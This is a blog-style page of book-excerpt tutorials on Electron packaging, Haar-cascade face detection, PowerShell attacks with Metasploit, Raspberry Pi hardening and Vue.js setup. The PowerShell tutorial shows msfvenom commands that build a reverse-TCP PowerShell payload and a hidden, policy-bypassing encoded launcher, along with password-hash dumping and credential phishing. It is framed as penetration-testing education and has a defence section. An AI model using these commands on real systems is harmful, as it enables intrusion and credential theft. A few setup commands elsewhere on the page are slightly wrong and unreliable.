VolumeMute I also want to be able to quit the application. A complete list of roles is available at Electron docs. With these roles, you can do a huge amount, including some specific macOS functions, along with the following: Work with the clipboard (cut, copy, paste, and pasteAndMatchStyle) Handle the window (minimize, close, quit, reload, and forceReload) Zoom (zoomIn, zoomOut, and resetZoom) To finish, and really just for the sake of it, let's add a notification trigger for when a file is written. Electron has a Notification module, but I opted to use node-notifier, which is quite simple to use. First, we'll add the package in the usual fashion: npm install node-notifier --save In serviceApi.js, we'll have to export the new function, so we'll able to import from elsewhere, as we'll see shortly: const electron = window.require("electron").remote; . . . export const notifier = electron.require("node-notifier"); Finally, let's use this in our world.actions.js file: import { notifier, . . . } from "./serviceApi"; With all our setup, actually sending a notification is quite simple, requiring very little code: // Source file: src/regionsApp/world.actions.js . . . export const saveRegionsToDisk = () => async ( dispatch: ({}) => any, getState: () => { regions: [] } ) => { showSaveDialog((filename: string = "") => { if (filename) { writeFile(filename, JSON.stringify(getState().regions), e => { if (e) { window.console.log(`ERROR SAVING ${filename}`, e); } else { notifier.notify({ title: "Regions app", message: `Regions saved to ${filename}` }); } }); } }); }; How it works First, we can easily check that the icon appears: Now, let's look at the menu. It has our options, including the shortcuts: Then, if we select an option with either the mouse or the global shortcut, the screen correctly loads the expected regions: Finally, let's see if the notifications work as expected. If we click on the Save regions to disk button and select a file, we'll see a notification, as in the following screenshot: Making a distributable package Now that we have a full app, all that's left to do is package it up so that you can deliver it as an executable file for Windows, Linux, or macOS users. How to do it. There are many ways of packaging an app, but we'll use a tool, electron-builder, that will make it even easier, if you can get its configuration right! First of all, we'll have to begin by defining the build configuration, and our initial step will be, as always, to install the tool: npm install electron-builder --save-dev To access the added tool, we'll require a new script, which we'll add in package.json: "scripts": { "dist": "electron-builder", . . . } We'll also have to add a few more details to package.json, which are needed for the build process and the produced app. In particular, the homepage change is required, because the CRA-created index.html file uses absolute paths that won't work later with Electron: "name": "chapter13", "version": "0.1.0", "description": "Regions app for chapter 13", "homepage": "./", "license": "free", "author": "Federico Kereki", Finally, some specific building configuration will be required. You cannot build for macOS with a Linux or Windows machine, so I'll leave that configuration out. We have to specify where the files will be found, what compression method to use, and so on: "build": { "appId": "com.electron.chapter13", "compression": "normal", "asar": true, "extends": null, "files": [ "electron-start.js", "build/**/*", "node_modules/**/*", "src/regionsApp/r_icon.png" ], "linux": { "target": "zip" }, "win": { "target": "portable" } } We have completed the required configuration, but there are also some changes to do in the code itself, and we'll have to adapt the code for building the package. When the packaged app runs, there won't be any webpack server running; the code will be taken from the built React package. The starter code will require the following changes: // Source file: electron-start.for.builder.js /* @flow */ const { app, BrowserWindow } = require("electron"); const path = require("path"); const url = require("url"); let mainWindow; const createWindow = () => { mainWindow = new BrowserWindow({ height: 768, width: 1024, icon: path.join(__dirname, "./build/r_icon.png") }); mainWindow.loadURL( url.format({ pathname: path.join(__dirname, "./build/index.html"), protocol: "file", slashes: true }) ); mainWindow.on("closed", () => { mainWindow = null; }); }; app.on("ready", createWindow); app.on("activate", () => mainWindow === null && createWindow()); app.on( "window-all-closed", () => process.platform !== "darwin" && app.quit() ); Mainly, we are taking icons and code from the build/ directory. An npm run build command will take care of generating that directory, so we can proceed with creating our executable app. How it works After doing this setup, building the app is essentially trivial. Just do the following, and all the distributable files will be found in the dist/ directory: npm run electron-builder Now that we have the Linux app, we can run it by unzipping the .zip file and clicking on the chapter13 executable. (The name came from the "name" attribute in package.json, which we modified earlier.) The result should be like what's shown in the following screenshot: I also wanted to try out the Windows EXE file. Since I didn't have a Windows machine, I made do by downloading a free VirtualBox virtual machine. After downloading the virtual machine, setting it up in VirtualBox, and finally running it, the result that was produced was the same as for Linux: So, we've managed to develop a React app, enhanced it with the Node and Electron features, and finally packaged it for different operating systems. With that, we are done! If you found this post useful, do check out the book, Modern JavaScript Web Development Cookbook.  You will learn how to create native mobile applications for Android and iOS with React Native, build client-side web applications using React and Redux, and much more. How to perform event handling in React [Tutorial] Flutter challenges Electron, soon to release a desktop client to accelerate mobile development Electron 3.0.0 releases with experimental textfield, and button APIs
Read more
  • 0
  • 0
  • 77232

article-image-implementing-face-detection-using-haar-cascades-adaboost-algorithm
Sugandha Lahoti
20 Feb 2018
7 min read
Save for later

Implementing face detection using the Haar Cascades and AdaBoost algorithm

Sugandha Lahoti
20 Feb 2018
7 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Ankit Dixit titled Ensemble Machine Learning. This book serves as an effective guide to using ensemble techniques to enhance machine learning models.[/box] In today’s tutorial, we will learn how to apply the AdaBoost classifier in face detection using Haar cascades. Face detection using Haar cascades Object detection using Haar feature-based cascade classifiers is an effective object detection method proposed by Paul Viola and Michael Jones in their paper Rapid Object Detection using a Boosted Cascade of Simple Features in 2001. It is a machine-learning-based approach where a cascade function is trained from a lot of positive and negative images. It is then used to detect objects in other images. Here, we will work with face detection. Initially, the algorithm needs a lot of positive images (images of faces) and negative images (images without faces) to train the classifier. Then we need to extract features from it. Features are nothing but numerical information extracted from the images that can be used to distinguish one image from another; for example, a histogram (distribution of intensity values) is one of the features that can be used to define several characteristics of an image even without looking at the image, such as dark or bright image, the intensity range of the image, contrast, and so on. We will use Haar features to detect faces in an image. Here is a figure showing different Haar features: These features are just like the convolution kernel; to know about convolution, you need to wait for the following chapters. For a basic understanding, convolutions can be described as in the following figure: So we can summarize convolution with these steps: Pick a pixel location from the image. Now crop a sub-image with the selected pixel as the center from the source image with the same size as the convolution kernel. Calculate an element-wise product between the values of the kernel and sub- image. Add the result of the product. Put the resultant value into the new image at the same place where you picked up the pixel location. Now we are going to do a similar kind of procedure, but with a slight difference for our images. Each feature of ours is a single value obtained by subtracting the sum of the pixels under the white rectangle from the sum of the pixels under the black rectangle. Now, all possible sizes and locations of each kernel are used to calculate plenty of features. (Just imagine how much computation it needs. Even a 24x24 window results in over 160,000 features.) For each feature calculation, we need to find the sum of the pixels under the white and black rectangles. To solve this, we will use the concept of integral image; we will discuss this concept very briefly here, as it's not a part of our context. Integral image Integral images are those images in which the pixel value at any (x,y) location is the sum of the all pixel values present before the current pixel. Its use can be understood by the following example: Image on the left and the integral image on the right. Let's see how this concept can help reduce computation time; let us assume a matrix A of size 5x5 representing an image, as shown here: Now, let's say we want to calculate the average intensity over the area highlighted: Region for addition Normally, you'd do the following: 9 + 1 + 2 + 6 + 0 + 5 + 3 + 6 + 5 = 37 37 / 9 = 4.11 This requires a total of 9 operations. Doing the same for 100 such operations would require: 100 * 9 = 900 operations. Now, let us first make a integral image of the preceding image: Making this image requires a total of 56 operations. Again, focus on the highlighted portion: To calculate the avg intensity, all you have to do is: (76 - 20) - (24 - 5) = 37 37 / 9 = 4.11 This required a total of 4 operations. To do this for 100 such operations, we would require: 56 + 100 * 4 = 456 operations. For just a hundred operations over a 5x5 matrix, using an integral image requires about 50% less computations. Imagine the difference it makes for large images and other such operations. Creation of an integral image changes other sum difference operations by almost O(1) time complexity, thereby decreasing the number of calculations. It simplifies the calculation of the sum of pixels—no matter how large the number of pixels—to an operation involving just four pixels. Nice, isn't it? It makes things superfast. However, among all of these features we calculated, most of them are irrelevant. For example, consider the following image. The top row shows two good features. The first feature selected seems to focus on the property that the region of the eyes is often darker than the region of the nose and cheeks. The second feature selected relies on the property that the eyes are darker than the bridge of the nose. But the same windows applying on cheeks or any other part is irrelevant. So how do we select the best features out of 160000+ features? It is achieved by AdaBoost. To do this, we apply each and every feature on all the training images. For each feature, it finds the best threshold that will classify the faces as positive and negative. Obviously, there will be errors or misclassifications. We select the features with the minimum error rate, which means they are the features that best classify the face and non-face images. Note: The process is not as simple as this. Each image is given an equal weight in the       beginning. After each classification, the weights of misclassified images are increased. Again, the same process is done. New error rates are calculated among the new weights. This process continues until the required accuracy or error rate is achieved or the required number of features is found. The final classifier is a weighted sum of these weak classifiers. It is called weak because it alone can't classify the image, but together with others, it forms a strong classifier. The paper says that even 200 features provide detection with 95% accuracy. Their final setup had around 6,000 features. (Imagine a reduction from 160,000+ to 6000 features. That is a big gain.) Face detection framework using the Haar cascade and AdaBoost algorithm So now, you take an image take each 24x24 window, apply 6,000 features to it, and check if it is a face or not. Wow! Wow! Isn't this a little inefficient and time consuming? Yes, it is. The authors of the algorithm have a good solution for that. In an image, most of the image region is non-face. So it is a better idea to have a simple method to verify that a window is not a face region. If it is not, discard it in a single shot. Don’t process it again. Instead, focus on the region where there can be a face. This way, we can find more time to check a possible face region. For this, they introduced the concept of a cascade of classifiers. Instead of applying all the 6,000 features to a window, we group the features into different stages of classifiers and apply one by one (normally first few stages will contain very few features). If a window fails in the first stage, discard it. We don’t consider the remaining features in it. If it passes, apply the second stage of features and continue the process. The window that passes all stages is a face region. How cool is the plan!!! The authors' detector had 6,000+ features with 38 stages, with 1, 10, 25, 25, and 50 features in the first five stages (two features in the preceding image were actually obtained as the best two features from AdaBoost). According to the authors, on average, 10 features out of 6,000+ are evaluated per subwindow. So this is a simple, intuitive explanation of how Viola-Jones face detection works. Read the paper for more details. If you found this post useful, do check out the book Ensemble Machine Learning to learn different machine learning aspects such as bagging, boosting, and stacking.    
Read more
  • 0
  • 0
  • 77087
article-image-weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial
Savia Lobo
04 Nov 2018
4 min read
Save for later

Weaponizing PowerShell with Metasploit and how to defend against PowerShell attacks [Tutorial]

Savia Lobo
04 Nov 2018
4 min read
PowerShell is a perfect tool for performing sophisticated attacks, and also, can be used side-by-side with the Metasploit Framework. This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN. In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests. Interactive PowerShell PowerShell attacks are already integrated into Metasploit. You can check by using the search command: msf> search powershell Now it is time to learn how to use Metasploit with PowerShell. For a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility: >msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe >msfvenom -p windows/exec CMD=“powershell -ep bypass -W Hidden -enc [Powershell script Here]” -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe PowerSploit PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit: # git clone https://github.com/PowerShellMafia/PowerSploit After cloning the project, use the ls command to list the files: From the following screenshot, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as: AntivirusBypass Exfiltration Persistence PowerSploit PowerUp PowerView Nishang – PowerShell for penetration testing Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang: # git clone https://github.com/samratashok/nishang As you can see from listing the downloaded project, Nishang is loaded with many various scripts and utilities for performing a lot of required tasks during penetration testing missions, such as: Privilege escalation Scanning Pivoting   You can explore all the available scripts by listing the content of Nishang project using the ls command: Let's explore some of Nishang's script power on a Windows machine: You can import all the modules using the Import-Module PowerShell cmdlet: Oops, something went wrong! Don't worry, in order to use the Import-Module, you need to open PowerShell as an administrator, and type  Set-ExecutionPolicy -ExecutionPolicy RemoteSigned: Then you can import the modules: Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information: If you want  to unveil WLAN keys, type Get-WLAN-Keys: You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. This is the output of it from my local machine: However, if you want to pop the command after getting a shell, use: Powershell.exe –exec bypass –Command “& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1' , Get-PassHashes}” You can even perform a phishing attack using Invoke-CredentialPhish, like in the previous demonstration. You can run this attack on the victim's machine: Defending against PowerShell attacks In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to: Implement the latest PowerShell version (version 5, when this book was written). To check, type Get-Host: Monitor PowerShell logs. Ensure a least-privilege policy and group policies settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker: Use the Constrained Language mode: PS C:Windowssystem32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine') To check the Constrained Language mode, type: $ExecutionContext.SessionState.LanguageMode That way, malicious scripts won't work: Thus, in this article, we saw the combination of Metasploit and PowerShell to perform more customized attacks and security tests. If you've enjoyed reading this post, and want to learn how to exploit enterprise VLANS, and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing. Pentest tool in focus: Metasploit Approaching a Penetration Test Using Metasploit Getting Started with Metasploitable2 and Kali Linux
Read more
  • 0
  • 0
  • 75684

article-image-how-to-secure-your-raspberry-pi-board-tutorial
Gebin George
13 Jul 2018
10 min read
Save for later

How to secure your Raspberry Pi board [Tutorial]

Gebin George
13 Jul 2018
10 min read
In this Raspberry Pi tutorial,  we will learn to secure our Raspberry Pi board. We will also learn to implement and enable the security features to make the Pi secure. This article is an excerpt from the book, Internet of Things with Raspberry Pi 3,  written by Maneesh Rao. Changing the default password Every Raspberry Pi that is running the Raspbian operating system has the default username pi and default password raspberry, which should be changed as soon as we boot up the Pi for the first time. If our Raspberry Pi is exposed to the internet and the default username and password has not been changed, then it becomes an easy target for hackers. To change the password of the Pi in case you are using the GUI for logging in, open the menu and go to Preferences and Raspberry Pi Configuration, as shown in Figure 10.1: Within Raspberry Pi Configuration under the System tab, select the change password option, which will prompt you to provide a new password. After that, click on OK and the password is changed (refer Figure 10.2): If you are logging in through PuTTY using SSH, then open the configuration setting by running the sudo raspi-config command, as shown in Figure 10.3: On successful execution of the command, the configuration window opens up. Then, select the second option to change the password and finish, as shown in Figure 10.4: It will prompt you to provide a new password; you just need to provide it and exit. Then, the new password is set. Refer to Figure 10.5: Changing the username All Raspberry Pis come with the default username pi, which should be changed to make it more secure. We create a new user and assign it all rights, and then delete the pi user. To add a new user, run the sudo adduser adminuser command in the terminal. It will prompt for a password; provide it, and you are done, as shown in Figure 10.6: Now, we will add our newly created user to the sudo group so that it has all the root-level permissions, as shown in Figure 10.7: Now, we can delete the default user, pi, by running the sudo deluser pi command. This will delete the user, but its repository folder /home/pi will still be there. If required, you can delete that as well. Making sudo require a password When a command is run with sudo as the prefix, then it'll execute it with superuser privileges. By default, running a command with sudo doesn't need a password, but this can cost dearly if a hacker gets access to Raspberry Pi and takes control of everything. To make sure that a password is required every time a command is run with superuser privileges, edit the 010_pi-nopasswd file under /etc/sudoers.d/ by executing the command shown in Figure 10.8: This command will open up the file in the nano editor; replace the content with pi ALL=(ALL) PASSWD: ALL, and save it. Updated Raspbain operating system To get the latest security updates, it is important to ensure that the Raspbian OS is updated with the latest version whenever available. Visit https://www.raspberrypi.org/documentation/raspbian/updating.md to learn the steps to update Raspbain. Improving SSH security SSH is one of the most common techniques to access Raspberry Pi over the network and it becomes necessary to use if you want to make it secure. Username and password security Apart from having a strong password, we can allow and deny access to specific users. This can be done by making changes in the sshd_config file. Run the sudo nano /etc/ssh/sshd_config command. This will open up the sshd_config file; then, add the following line(s) at the end to allow or deny specific users: To allow users, add the line: AllowUsers tom john merry To deny users, add this line: DenyUsers peter methew For these changes to take effect, it is necessary to reboot the Raspberry Pi. Key-based authentication Using a public-private key pair for authenticating a client to an SSH server (Raspberry Pi), we can secure our Raspberry Pi from hackers. To enable key-based authentication, we first need to generate a public-private key pair using tools called PuTTYgen for Windows and ssh-keygen for Linux. Note that a key pair should be generated by the client and not by Raspberry Pi. For our purpose, we will use PuTTYgen for generating the key pair. Download PuTTY from the following web link: Note that puTTYgen comes with PuTTY, so you need not install it separately. Open the puTTYgen client and click on Generate, as shown in Figure 10.9: Next, we need to hover the mouse over the blank area to generate the key, as highlighted in Figure 10.10: Once the key generation process is complete, there will be an option to save the public and private keys separately for later use, as shown in Figure 10.11—ensure you keep your private key safe and secure: Let's name the public key file rpi_pubkey, and the private key file rpi_privkey.ppk and transfer the public key file rpi_pubkey from our system to Raspberry. Log in to Raspberry Pi and under the user repository, which is /home/pi in our case, create a special directory with the name .ssh, as shown in Figure 10.12: Now, move into the .ssh directory using the cd command and create/open the file with the name authorized_keys, as shown in Figure 10.13: The nano command opens up the authorized_keys file in which we will copy the content of our public key file, rpi_pubkey. Then, save (Ctrl + O) and close the file (Ctrl + X). Now, provide the required permissions for your pi user to access the files and folders. Run the following commands to set permissions: chmod 700 ~/.ssh/ (set permission for .ssh directory) chmod 600 ~/.ssh/authorized_keys (set permission for key file) Refer to Figure 10.14, which shows the permissions before and after running the chmod commands: Finally, we need to disable the password logins to avoid unauthorized access by editing the /etc/ssh/sshd_config file. Open the file in the nano editor by running the following command: sudo nano etc/ssh/sshd_config In the file, there is a parameter #PasswordAuthentication yes. We need to uncomment the line by removing # and setting the value to no: PasswordAuthentication no Save (Ctrl + O) and close the file (Ctrl + X). Now, password login is prohibited and we can access the Raspberry Pi using the key file only. Restart Raspberry Pi to make sure all the changes come into effect with the following command: sudo reboot Here, we are assuming that both Raspberry Pi and the system that is being used to log in to Pi are one and the same. Now, you can log in to Raspberry Pi using PuTTY. Open the PuTTY terminal and provide the IP address of your Pi. On the left-hand side of the PuTTY window, under Category, expand SSH as shown in Figure 10.15: Then, select Auth, which will provide the option to browse and upload the private key file, as shown in Figure 10.16: Once the private key file is uploaded, click on Open and it will log in to Raspberry Pi successfully without any password. Setting up a firewall There are many firewall solutions available for Linux/Unix-based operating systems, such as Raspbian OS in the case of Raspberry Pi. These firewall solutions have IP tables underneath to filter packets coming from different sources and allow only the legitimate ones to enter the system. IP tables are installed in Raspberry Pi by default, but are not set up. It is a bit tedious to set up the default IP table. So, we will use an alternate tool, Uncomplicated Fire Wall (UFW), which is extremely easy to set up and use ufw. To install ufw, run the following command (refer to Figure 10.17): sudo apt install ufw Once the download is complete, enable ufw (refer to Figure 10.18) with the following command: sudo ufw enable If you want to disable the firewall (refer to Figure 10.20), use the following command: sudo ufw disable Now, let's see some features of ufw that we can use to improve the safety of Raspberry Pi. Allow traffic only on a particular port using the allow command, as shown in Figure 10.21: Restrict access on a port using the deny command, as shown in Figure 10.22: We can also allow and restrict access for a specific service on a specific port. Here, we will allow tcp traffic on port 21 (refer to Figure 10.23): We can check the status of all the rules under the firewall using the status command, as shown in Figure 10.24: Restrict access for particular IP addresses from a particular port. Here, we deny access to port 30 from the IP address 192.168.2.1, as shown in Figure 10.25: To learn more about ufw, visit https://www.linux.com/learn/introduction-uncomplicated-firewall-ufw. Fail2Ban At times, we use our Raspberry Pi as a server, which interacts with other devices that act as a client for Raspberry Pi. In such scenarios, we need to open certain ports and allow certain IP addresses to access them. These access points can become entry points for hackers to get hold of Raspberry Pi and do damage. To protect ourselves from this threat, we can use the fail2ban tool. This tool monitors the logs of Raspberry Pi traffic, keeps a check on brute-force attempts and DDOS attacks, and informs the installed firewall to block a request from that particular IP address. To install Fail2Ban, run the following command: sudo apt install fail2ban Once the download is completed successfully, a folder with the name fail2ban is created at path /etc. Under this folder, there is a file named jail.conf. Copy the content of this file to a new file and name it jail.local. This will enable fail2ban on Raspberry Pi. To copy, you can use the following command: sudo /etc/fail2ban/jail.conf /etc/fail2ban/jail.local Now, edit the file using the nano editor: sudo nano /etc/fail2ban/jail.local Look for the [ssh] section. It has a default configuration, as shown in Figure 10.26: This shows that Fail2Ban is enabled for ssh. It checks the port for ssh connections, filters the traffic as per conditions set under in the sshd configuration file located at path etcfail2banfilters.dsshd.conf, parses the logs at /var/log/auth.log for any suspicious activity, and allows only six retries for login, after which it restricts that particular IP address. The default action taken by fail2ban in case someone tries to hack is defined in jail.local, as shown in Figure 10.27: This means when the iptables-multiport action is taken against any malicious activity, it runs as per the configuration in /etc/fail2ban/action.d/iptables-multiport.conf. To summarize, we learned how to secure our Raspberry Pi single-board. If you found this post useful, do check out the book Internet of Things with Raspberry Pi 3, to interface various sensors and actuators with Raspberry Pi 3 to send data to the cloud. Build an Actuator app for controlling Illumination with Raspberry Pi 3 Should you go with Arduino Uno or Raspberry Pi 3 for your next IoT project? Build your first Raspberry Pi project
Read more
  • 0
  • 0
  • 74841

article-image-installing-and-using-vuejs
Packt
10 Jan 2017
14 min read
Save for later

Installing and Using Vue.js

Packt
10 Jan 2017
14 min read
In this article by Olga Filipova, the author of the book Learning Vue.js 2, explores the key concepts of Vue.js framework to understand all its behind the scenes. Also in this article, we will analyze all possible ways of installing Vue.js. We will also learn the ways of debugging and testing our applications. (For more resources related to this topic, see here.) So, in this article we are going to learn: What is MVVM architecture paradigm and how does it apply to Vue.js How to install, start, run, and debug Vue application MVVM architectural pattern Do you remember how to create the Vue instance? We were instantiating it calling new Vue({…}). You also remember that in the options we were passing the element on the page where this Vue instance should be bound and the data object that contained properties we wanted to bind to our view. The data object is our model and DOM element where Vue instance is bound is view. Classic View-Model representation where Vue instance binds one to another In the meantime, our Vue instance is something that helps to bind our model to the View and vice-versa. Our application thus follows Model-View-ViewModel (MVVM) pattern where the Vue instance is a ViewModel. The simplified diagram of Model View ViewModel pattern Our Model contains data and some business logic, our View is responsible for its representation. ViewModel handles data binding ensuring the data changed in the Model is immediately affecting the View layer and vice-versa. Our Views thus become completely data-driven. ViewModel becomes responsible for the control of data flow, making data binding fully declarative for us. Installing, using, and debugging a Vue.js application In this section, we will analyze all possible ways of installing Vue.js. We will also create a skeleton for our. We will also learn the ways of debugging and testing our applications. Installing Vue.js There are a number of ways to install Vue.js. Starting from classic including the downloaded script into HTML within <script> tags, using tools like bower, npm, or Vue's command-line interface (vue-cli) to bootstrap the whole application. Let's have a look at all these methods and choose our favorite. In all these examples we will just show a header on a page saying Learning Vue.js. Standalone Download the vue.js file. There are two versions, minified and developer version. The development version is here: https://vuejs.org/js/vue.js. The minified version is here: https://vuejs.org/js/vue.min.js. If you are developing, make sure you use the development non-minified version of Vue. You will love nice tips and warnings on the console. Then just include vue.js in the script tags: <script src=“vue.js”></script> Vue is registered in the global variable. You are ready to use it. Our example will then look as simple as the following: <div id="app"> <h1>{{ message }}</h1> </div> <script src="vue.js"></script> <script> var data = { message: "Learning Vue.js" }; new Vue({ el: "#app", data: data }); </script> CDN Vue.js is available in the following CDN's: jsdelivr: https://cdn.jsdelivr.net/vue/1.0.25/vue.min.js cdnjs: https://cdnjs.cloudflare.com/ajax/libs/vue/1.0.25/vue.min.js npmcdn: https://npmcdn.com/vue@1.0.25/dist/vue.min.js Just put the url in source in the script tag and you are ready to use Vue! <script src=“ https://cdnjs.cloudflare.com/ajax/libs/vue/1.0.25/vue.min.js”></script> Beware so, the CDN version might not be synchronized with the latest available version of Vue. Thus, the example will look like exactly the same as in the standalone version, but instead of using downloaded file in the <script> tags, we are using a CDN URL. Bower If you are already managing your application with bower and don't want to use other tools, there's also a bower distribution of Vue. Just call bower install: # latest stable release bower install vue Our example will look exactly like the two previous examples, but it will include the file from the bower folder: <script src=“bower_components/vue/dist/vue.js”></script> CSP-compliant CSP (content security policy) is a security standard that provides a set of rules that must be obeyed by the application in order to prevent security attacks. If you are developing applications for browsers, more likely you know pretty well about this policy! For the environments that require CSP-compliant scripts, there’s a special version of Vue.js here: https://github.com/vuejs/vue/tree/csp/dist Let’s do our example as a Chrome application to see the CSP compliant vue.js in action! Start from creating a folder for our application example. The most important thing in a Chrome application is the manifest.json file which describes your application. Let’s create it. It should look like the following: { "manifest_version": 2, "name": "Learning Vue.js", "version": "1.0", "minimum_chrome_version": "23", "icons": { "16": "icon_16.png", "128": "icon_128.png" }, "app": { "background": { "scripts": ["main.js"] } } } The next step is to create our main.js file which will be the entry point for the Chrome application. The script should listen for the application launching and open a new window with given sizes. Let’s create a window of 500x300 size and open it with index.html: chrome.app.runtime.onLaunched.addListener(function() { // Center the window on the screen. var screenWidth = screen.availWidth; var screenHeight = screen.availHeight; var width = 500; var height = 300; chrome.app.window.create("index.html", { id: "learningVueID", outerBounds: { width: width, height: height, left: Math.round((screenWidth-width)/2), top: Math.round((screenHeight-height)/2) } }); }); At this point the Chrome specific application magic is over and now we shall just create our index.html file that will do the same thing as in the previous examples. It will include the vue.js file and our script where we will initialize our Vue application: <html lang="en"> <head> <meta charset="UTF-8"> <title>Vue.js - CSP-compliant</title> </head> <body> <div id="app"> <h1>{{ message }}</h1> </div> <script src="assets/vue.js"></script> <script src="assets/app.js"></script> </body> </html> Download the CSP-compliant version of vue.js and add it to the assets folder. Now let’s create the app.js file and add the code that we already wrote added several times: var data = { message: "Learning Vue.js" }; new Vue({ el: "#app", data: data }); Add it to the assets folder. Do not forget to create two icons of 16 and 128 pixels and call them icon_16.png and icon_128.png. Your code and structure in the end should look more or less like the following: Structure and code for the sample Chrome application using vue.js And now the most important thing. Let’s check if it works! It is very very simple. Go to chrome://extensions/ url in your Chrome browser. Check Developer mode checkbox. Click on Load unpacked extension... and check the folder that we’ve just created. Your app will appear in the list! Now just open a new tab, click on apps, and check that your app is there. Click on it! Sample Chrome application using vue.js in the list of chrome apps Congratulations! You have just created a Chrome application! NPM NPM installation method is recommended for large-scale applications. Just run npm install vue: # latest stable release npm install vue # latest stable CSP-compliant release npm install vue@csp And then require it: var Vue = require(“vue”); Or, for ES2015 lovers: import Vue from “vue”; Our HTML in our example will look exactly like in the previous examples: <html lang="en"> <head> <meta charset="UTF-8"> <title>Vue.js - NPM Installation</title> </head> <body> <div id="app"> <h1>{{ message }}</h1> </div> <script src="main.js"></script> </body> </html> Now let’s create a script.js file that will look almost exactly the same as in standalone or CDN version with only difference that it will require vue.js: var Vue = require("vue"); var data = { message: "Learning Vue.js" }; new Vue({ el: "#app", data: data }); Let’s install vue and browserify in order to be able to compile our script.js into the main.js file: npm install vue –-save-dev npm install browserify –-save-dev In the package.json file add also a script for build that will execute browserify on script.js transpiling it into main.js. So our package.json file will look like this: { "name": "learningVue", "scripts": { "build": "browserify script.js -o main.js" }, "version": "0.0.1", "devDependencies": { "browserify": "^13.0.1", "vue": "^1.0.25" } } Now run: npm install npm run build And open index.html in the browser. I have a friend that at this point would say something like: really? So many steps, installations, commands, explanations… Just to output some header? I’m out! If you are also thinking this, wait. Yes, this is true, now we’ve done something really simple in a rather complex way, but if you stay with me a bit longer, you will see how complex things become easy to implement if we use the proper tools. Also, do not forget to check your Pomodoro timer, maybe it’s time to take a rest! Vue-cli Vue provides its own command line interface that allows bootstrapping single page applications using whatever workflows you want. It immediately provides hot reloading and structure for test driven environment. After installing vue-cli just run vue init <desired boilerplate> <project-name> and then just install and run! # install vue-cli $ npm install -g vue-cli # create a new project $ vue init webpack learn-vue # install and run $ cd learn-vue $ npm install $ npm run dev Now open your browser on localhost:8080. You just used vue-cli to scaffold your application. Let’s adapt it to our example. Open a source folder. In the src folder you will find an App.vue file. Do you remember we talked about Vue components that are like bricks from which you build your application? Do you remember that we were creating them and registering inside our main script file and I mentioned that we will learn to build components in more elegant way? Congratulations, you are looking at the component built in a fancy way! Find the line that says import Hello from './components/Hello'. This is exactly how the components are being reused inside other components. Have a look at the template at the top of the component file. At some point it contains the tag <hello></hello>. This is exactly where in our HTML file will appear the Hello component. Have a look at this component, it is in the src/components folder. As you can see, it contains a template with {{ msg }} and a script that exports data with defined msg. This is exactly the same what we were doing in our previous examples without using components. Let’s slightly modify the code to make it the same as in the previous examples. In the Hello.vue file change the msg in data object: <script> export default { data () { return { msg: “Learning Vue.js” } } } </script> In the App.vue component remove everything from the template except the hello tag, so the template looks like this: <template> <div id="app"> <hello></hello> </div> </template> Now if you rerun the application you will see our example with beautiful styles we didn’t touch: vue application bootstrapped using vue-cli Besides webpack boilerplate template you can use the following configurations with your vue-cli: webpack-simple: A simple Webpack + vue-loader setup for quick prototyping. browserify: A full-featured Browserify + vueify setup with hot-reload, linting and unit testing. browserify-simple: A simple Browserify + vueify setup for quick prototyping. simple: The simplest possible Vue setup in a single HTML file Dev build My dear reader, I can see your shining eyes and I can read your mind. Now that you know how to install and use Vue.js and how does it work, you definitely want to put your hands deeply into the core code and contribute! I understand you. For this you need to use development version of Vue.js which you have to download from GitHub and compile yourself. Let’s build our example with this development version vue. Create a new folder, for example, dev-build and copy all the files from the npm example to this folder. Do not forget to copy the node_modules folder. You should cd into it and download files from GitHub to it, then run npm install and npm run build. cd <APP-PATH>/node_modules git clone https://github.com/vuejs/vue.git cd vue npm install npm run build Now build our example application: cd <APP-PATH> npm install npm run build Open index.html in the browser, you will see the usual Learning Vue.js header. Let’s now try to change something in vue.js source! Go to the node_modules/vue/src folder. Open config.js file. The second line defines delimeters: let delimiters = ['{{', '}}'] This defines the delimiters used in the html templates. The things inside these delimiters are recognized as a Vue data or as a JavaScript code. Let’s change them! Let’s replace “{{” and “}}” with double percentage signs! Go on and edit the file: let delimiters = ['%%', '%%'] Now rebuild both Vue source and our application and refresh the browser. What do you see? After changing Vue source and replacing delimiters, {{}} delimeters do not work anymore! The message inside {{}} is no longer recognized as data that we passed to Vue. In fact, it is being rendered as part of HTML. Now go to the index.html file and replace our curly brackets delimiters with double percentage: <div id="app"> <h1>%% message %%</h1> </div> Rebuild our application and refresh the browser! What about now? You see how easy it is to change the framework’s code and to try out your changes. I’m sure you have plenty of ideas about how to improve or add some functionality to Vue.js. So change it, rebuild, test, deploy! Happy pull requests! Debug Vue application You can debug your Vue application the same way you debug any other web application. Use your developer tools, breakpoints, debugger statements, and so on. Vue also provides vue devtools so it gets easier to debug Vue applications. You can download and install it from the Chrome web store: https://chrome.google.com/webstore/detail/vuejs-devtools/nhdogjmejiglipccpnnnanhbledajbpd After installing it, open, for example, our shopping list application. Open developer tools. You will see the Vue tab has automatically appeared: Vue devtools In our case we only have one component—Root. As you can imagine, once we start working with components and having lots of them, they will all appear in the left part of the Vue devtools palette. Click on the Root 